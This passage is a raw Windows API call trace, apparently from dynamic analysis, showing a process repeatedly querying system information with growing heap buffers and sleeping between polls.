RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0284.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0284.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.069] Sleep (dwMilliseconds=0x110) [0284.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0284.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0284.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0284.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0284.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0284.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0284.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0284.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0284.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.083] Sleep (dwMilliseconds=0x110) [0284.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0284.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.091] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0284.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0284.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0284.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0284.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0284.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0284.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0284.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.331] Sleep (dwMilliseconds=0x110) [0284.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0284.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0284.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0284.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0284.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0284.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0284.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0284.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0284.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.376] Sleep (dwMilliseconds=0x110) [0284.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0284.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0284.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0284.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0284.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0284.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0284.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0284.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0284.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.469] Sleep (dwMilliseconds=0x110) [0284.495] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0284.495] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.495] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0284.495] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0284.495] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.496] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0284.496] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0284.496] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.496] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0284.496] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0284.496] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.497] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0284.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.498] Sleep (dwMilliseconds=0x110) [0284.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0284.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0284.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0284.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0284.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0284.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0284.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0284.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0284.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.519] Sleep (dwMilliseconds=0x110) [0284.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0284.528] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0284.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0284.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0284.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0284.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0284.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0284.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0284.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.532] Sleep (dwMilliseconds=0x110) [0284.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0284.600] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0284.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0284.600] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.601] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0284.601] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0284.601] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.602] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0284.602] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0284.602] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.602] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0284.602] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.603] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.603] Sleep (dwMilliseconds=0x110) [0284.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0284.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.607] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0284.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0284.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0284.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0284.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0284.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0284.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0284.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.609] Sleep (dwMilliseconds=0x110) [0284.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0284.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0284.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0284.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0284.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0284.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0284.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0284.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0284.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.625] Sleep (dwMilliseconds=0x110) [0284.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0284.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0284.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0284.645] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0284.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0284.646] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0284.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0284.647] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0284.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.648] Sleep (dwMilliseconds=0x110) [0284.653] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0284.653] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0284.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0284.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0284.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0284.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0284.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0284.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0284.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.657] Sleep (dwMilliseconds=0x110) [0284.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0284.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0284.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0284.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0284.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0284.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0284.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0284.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0284.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.678] Sleep (dwMilliseconds=0x110) [0284.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0284.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0284.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0284.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0284.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0284.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: 